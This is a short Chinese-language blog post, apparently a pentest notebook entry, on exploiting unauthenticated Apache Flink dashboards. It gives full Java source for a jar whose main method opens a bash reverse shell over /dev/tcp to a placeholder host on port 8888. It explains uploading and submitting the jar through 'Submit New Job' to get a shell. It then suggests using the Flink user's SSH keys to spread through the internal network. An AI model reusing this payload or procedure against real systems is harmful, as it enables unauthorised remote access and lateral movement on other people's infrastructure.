Apache Flink未授权访问+反弹shell

Apache Flink未授权访问+反弹shell

某个项目在内网中遇到了Flink未授权访问,做个记录。

访问后点开Submit New Job
右上角Add new上传恶意jar包。
flink
首先用idea新建个项目,内容就反弹shell命令。

public class Revs {
    public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/xxxx/8888;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

-w1083
-w543

-w379
-w711

这样一个jar包就制作成功了。
上传后点击jar包名的任务,然后提交。shell已经返回了。

可以注意下,flink是有很多节点的,所以反弹的shell权限用户会有sshkey。可以进一步扩展内网。

本文链接:

http://www.8sec.cc/index.php/archives/387/
1 + 8 =
快来做第一个评论的人吧~